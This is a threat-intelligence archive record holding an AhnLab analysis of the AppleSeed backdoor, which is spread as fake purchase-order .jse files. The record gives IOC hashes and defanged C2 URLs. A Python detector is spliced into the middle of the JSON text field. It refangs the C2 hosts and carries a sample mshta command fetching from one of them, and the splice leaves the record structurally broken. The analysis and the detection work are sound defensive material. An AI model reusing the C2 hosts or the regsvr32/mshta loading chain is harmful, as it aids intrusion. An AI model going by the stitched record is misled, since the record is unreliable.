{
	"id": "989e4aa3-9b22-43f4-9add-5e9feee836fe",
	"created_at": "2026-04-06T01:31:56.842383Z",
	"updated_at": "2026-04-10T03:37:40.79386Z",
	"deleted_at": null,
	"sha1_hash": "9029565e76ac67fc9125c9d84096a566e4bd48ae",
	"title": "AppleSeed Disguised as Purchase Order and Request Form Being Distributed",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1022948,
	"plain_text": "AppleSeed Disguised as Purchase Order and Request Form Being Distributed\r\nBy ATCP\r\nPublished: 2022-06-29 · Archived: 2026-04-06 00:49:27 UTC\r\nThe ASEC analysis team has recently discovered AppleSeed being distributed disguised as purchase orders and request forms. AppleSeed is a backdoor mainly used by the Kimsuky group. It stays resident on the system and carries out malicious actions by receiving commands from the attacker.\r\nThe malware is currently being distributed under the following filenames.\r\nPurchase order-**-2022****-001-National Tax Service additionally implementing security sensors in 5 regional tax offices_***.jse\r\nRequest form(general manager ***).jse\r\nThe JSE (JScript Encoded) file contains encoded JavaScript. When it is run, it drops the AppleSeed backdoor (a DLL file) and the purchase-order PDF that acts as bait into the %ProgramData% path, and then automatically opens the PDF (see Figure 2).\r\nhttps://asec.ahnlab.com/en/36368/\r\nPage 1 of 5\r\nThe JSE file uses regsvr32.exe to decode and run the backdoor file (area shaded purple in the figure) and mshta.exe to download and run additional scripts (area shaded red).\r\nWhen the scripts are run, the following information is collected and sent to the C2.\r\nBasic information about the PC (PC name, OS version, processor, and memory)\r\nUser account credentials\r\nNetwork information (IP address, routing table, port usage, and ARP list)\r\nList of running processes and services\r\nFolders and files within Program Files / programs within the Start menu / list of recent files\r\nThe AppleSeed backdoor continuously receives commands from the C2 server to download and run additional modules or to carry out whatever other actions the attacker wants.
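The chain described above (a .jse run by a script host, regsvr32.exe loading the dropped DLL from %ProgramData%, mshta.exe fetching further scripts from the C2) is what a detection should key on rather than any single file hash. The following Python is an added example written for this page, not code from ASEC or from the post: the Sysmon-style process-creation records, file paths and process IDs are constructed for illustration, and the only values taken from the post are the two defanged C2 URLs from the IOC list, refanged here for matching.

```python
# Added example for this page, not code from the ASEC post. It flags the
# AppleSeed delivery chain in Sysmon-style process-creation records:
#   script host (wscript/cscript) running a .jse
#     -> regsvr32.exe loading a DLL from %ProgramData%
#     -> mshta.exe fetching a script from the C2
# Field names mirror Sysmon Event ID 1; all sample values are constructed.
from dataclasses import dataclass

SCRIPT_HOSTS = ('wscript.exe', 'cscript.exe')
# Stage-two binaries named in the post.
STAGE_TWO = ('regsvr32.exe', 'mshta.exe')
# Drop directory named in the post (compared case-insensitively).
DROP_DIR = 'c:\\programdata\\'
# The two defanged C2 URLs from the IOC list in the post.
DEFANGED_C2 = (
    'http[:]//dirwear[.]000webhostapp[.]com/',
    'http[:]//gerter[.]getenjoyment[.]net/',
)


def refang(url):
    # Undo the usual [:] and [.] defanging so the value can be matched.
    return url.replace('[:]', ':').replace('[.]', '.')


C2_HOSTS = tuple(refang(u).split('//', 1)[1].rstrip('/') for u in DEFANGED_C2)


@dataclass
class ProcEvent:
    pid: int
    image: str
    command_line: str
    parent_pid: int
    parent_image: str


def basename(path):
    return path.rsplit('\\', 1)[-1].lower()


def classify(ev):
    # Return the reasons an event looks like part of the chain (empty = clean).
    reasons = []
    img = basename(ev.image)
    parent = basename(ev.parent_image)
    cmd = ev.command_line.lower()
    if img in SCRIPT_HOSTS and '.jse' in cmd:
        reasons.append('script host running a .jse file')
    if parent in SCRIPT_HOSTS and img in STAGE_TWO:
        reasons.append(f'{img} spawned by script host {parent}')
    if img == 'regsvr32.exe' and DROP_DIR in cmd:
        reasons.append('regsvr32 loading a module from %ProgramData%')
    if img == 'mshta.exe' and ('http://' in cmd or 'https://' in cmd):
        reasons.append('mshta fetching a remote script')
    for host in C2_HOSTS:
        if host in cmd:
            reasons.append(f'known C2 host {host}')
    return reasons


def find_chains(events):
    # Pair every flagged process with its parent PID so the analyst sees the
    # tree (script host -> regsvr32/mshta) rather than isolated alerts.
    by_pid = {e.pid: e for e in events}
    hits = []
    for ev in events:
        reasons = classify(ev)
        if reasons:
            parent = by_pid.get(ev.parent_pid)
            hits.append((ev.pid, basename(ev.image), reasons,
                         parent.pid if parent else None))
    return hits


# Constructed sample: one infected chain plus a benign regsvr32 use.
SAMPLE_EVENTS = [
    ProcEvent(1000, 'C:\\Windows\\explorer.exe', 'explorer.exe',
              800, 'C:\\Windows\\System32\\userinit.exe'),
    ProcEvent(2000, 'C:\\Windows\\System32\\wscript.exe',
              'wscript.exe C:\\Users\\victim\\Downloads\\request_form.jse',
              1000, 'C:\\Windows\\explorer.exe'),
    ProcEvent(2100, 'C:\\Windows\\System32\\regsvr32.exe',
              'regsvr32.exe /s C:\\ProgramData\\sample.dll',
              2000, 'C:\\Windows\\System32\\wscript.exe'),
    ProcEvent(2200, 'C:\\Windows\\System32\\mshta.exe',
              'mshta.exe http://dirwear.000webhostapp.com/',
              2000, 'C:\\Windows\\System32\\wscript.exe'),
    ProcEvent(3000, 'C:\\Windows\\System32\\regsvr32.exe',
              'regsvr32.exe /s C:\\Program Files\\Vendor\\plugin.dll',
              1000, 'C:\\Windows\\explorer.exe'),
]

if __name__ == '__main__':
    for pid, name, reasons, parent_pid in find_chains(SAMPLE_EVENTS):
        print(pid, name, 'parent', parent_pid, '-', '; '.join(reasons))
```

Run as a script it prints the three processes of the constructed chain (PIDs 2000, 2100 and 2200, the last two pointing back to parent 2000) and stays silent on the benign regsvr32.exe that explorer.exe launched from Program Files. The parent-child link is the part worth keeping when adapting this to real Sysmon data: regsvr32.exe and mshta.exe on their own are common, but either of them spawned by a script host, or regsvr32.exe loading from %ProgramData%, is rare enough to alert on even before a hash or C2 domain is known.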
For a detailed analysis of AppleSeed, refer to the following link.\r\nThe figure below shows the overall process tree after the scripts are run.\r\nBecause the bait file is also opened, users normally cannot tell that their systems have been infected. As the files mentioned above mainly target specific companies, users should refrain from running attachments in emails from unknown sources.\r\nAhnLab’s anti-malware software, V3, currently detects and blocks the files under the following aliases.\r\n[File Detection]\r\nDropper/JS.Generic\r\nBackdoor/Win.AppleSeed.R499775\r\nMD5\r\n1ae2e46aac55e7f92c72b56b387bc945\r\n67e7e8600a57e9430a43bf8c5f98c6bd\r\n7d445b39a090b486aaa002b282b4d8cb\r\nec9dcef04c5c89d6107d23b0668cc1c1\r\nURL\r\nhttp[:]//dirwear[.]000webhostapp[.]com/\r\nhttp[:]//gerter[.]getenjoyment[.]net/\r\nAdditional IOCs are available on AhnLab TIP. Gain access to related IOCs and detailed analysis by subscribing to AhnLab TIP.\r\nSource: https://asec.ahnlab.com/en/36368/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://asec.ahnlab.com/en/36368/"
	],
	"report_names": [
		"36368"
	],
	"threat_actors": [
		{
			"id": "191d7f9a-8c3c-442a-9f13-debe259d4cc2",
			"created_at": "2022-10-25T15:50:23.280374Z",
			"updated_at": "2026-04-10T02:00:05.305572Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"Kimsuky",
				"Black Banshee",
				"Velvet Chollima",
				"Emerald Sleet",
				"THALLIUM",
				"APT43",
				"TA427",
				"Springtail"
			],
			"source_name": "MITRE:Kimsuky",
			"tools": [
				"Troll Stealer",
				"schtasks",
				"Amadey",
				"GoBear",
				"Brave Prince",
				"CSPY Downloader",
				"gh0st RAT",
				"AppleSeed",
				"Gomir",
				"NOKKI",
				"QuasarRAT",
				"Gold Dragon",
				"PsExec",
				"KGH_SPY",
				"Mimikatz",
				"BabyShark",
				"TRANSLATEXT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "760f2827-1718-4eed-8234-4027c1346145",
			"created_at": "2023-01-06T13:46:38.670947Z",
			"updated_at": "2026-04-10T02:00:03.062424Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"G0086",
				"Emerald Sleet",
				"THALLIUM",
				"Springtail",
				"Sparkling Pisces",
				"Thallium",
				"Operation Stolen Pencil",
				"APT43",
				"Velvet Chollima",
				"Black Banshee"
			],
			"source_name": "MISPGALAXY:Kimsuky",
			"tools": [
				"xrat",
				"QUASARRAT",
				"RDP Wrapper",
				"TightVNC",
				"BabyShark",
				"RevClient"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d",
			"created_at": "2025-08-07T02:03:25.101147Z",
			"updated_at": "2026-04-10T02:00:03.846812Z",
			"deleted_at": null,
			"main_name": "NICKEL KIMBALL",
			"aliases": [
				"APT43",
				"ARCHIPELAGO",
				"Black Banshee",
				"Crooked Pisces",
				"Emerald Sleet",
				"ITG16",
				"Kimsuky",
				"Larva-24005",
				"Opal Sleet",
				"Ruby Sleet",
				"SharpTongue",
				"Sparking Pisces",
				"Springtail",
				"TA406",
				"TA427",
				"THALLIUM",
				"UAT-5394",
				"Velvet Chollima"
			],
			"source_name": "Secureworks:NICKEL KIMBALL",
			"tools": [
				"BabyShark",
				"FastFire",
				"FastSpy",
				"FireViewer",
				"Konni"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "71a1e16c-3ba6-4193-be62-be53527817bc",
			"created_at": "2022-10-25T16:07:23.753455Z",
			"updated_at": "2026-04-10T02:00:04.73769Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"APT 43",
				"Black Banshee",
				"Emerald Sleet",
				"G0086",
				"G0094",
				"ITG16",
				"KTA082",
				"Kimsuky",
				"Larva-24005",
				"Larva-25004",
				"Operation Baby Coin",
				"Operation Covert Stalker",
				"Operation DEEP#DRIVE",
				"Operation DEEP#GOSU",
				"Operation Kabar Cobra",
				"Operation Mystery Baby",
				"Operation Red Salt",
				"Operation Smoke Screen",
				"Operation Stealth Power",
				"Operation Stolen Pencil",
				"SharpTongue",
				"Sparkling Pisces",
				"Springtail",
				"TA406",
				"TA427",
				"Thallium",
				"UAT-5394",
				"Velvet Chollima"
			],
			"source_name": "ETDA:Kimsuky",
			"tools": [
				"AngryRebel",
				"AppleSeed",
				"BITTERSWEET",
				"BabyShark",
				"BoBoStealer",
				"CSPY Downloader",
				"Farfli",
				"FlowerPower",
				"Gh0st RAT",
				"Ghost RAT",
				"Gold Dragon",
				"GoldDragon",
				"GoldStamp",
				"JamBog",
				"KGH Spyware Suite",
				"KGH_SPY",
				"KPortScan",
				"KimJongRAT",
				"Kimsuky",
				"LATEOP",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Lovexxx",
				"MailPassView",
				"Mechanical",
				"Mimikatz",
				"MoonPeak",
				"Moudour",
				"MyDogs",
				"Mydoor",
				"Network Password Recovery",
				"PCRat",
				"ProcDump",
				"PsExec",
				"ReconShark",
				"Remote Desktop PassView",
				"SHARPEXT",
				"SWEETDROP",
				"SmallTiger",
				"SniffPass",
				"TODDLERSHARK",
				"TRANSLATEXT",
				"Troll Stealer",
				"TrollAgent",
				"VENOMBITE",
				"WebBrowserPassView",
				"xRAT"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775439116,
	"ts_updated_at": 1775792260,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9029565e76ac67fc9125c9d84096a566e4bd48ae.pdf",
		"text": "https://archive.orkl.eu/9029565e76ac67fc9125c9d84096a566e4bd48ae.txt",
		"img": "https://archive.orkl.eu/9029565e76ac67fc9125c9d84096a566e4bd48ae.jpg"
	}
}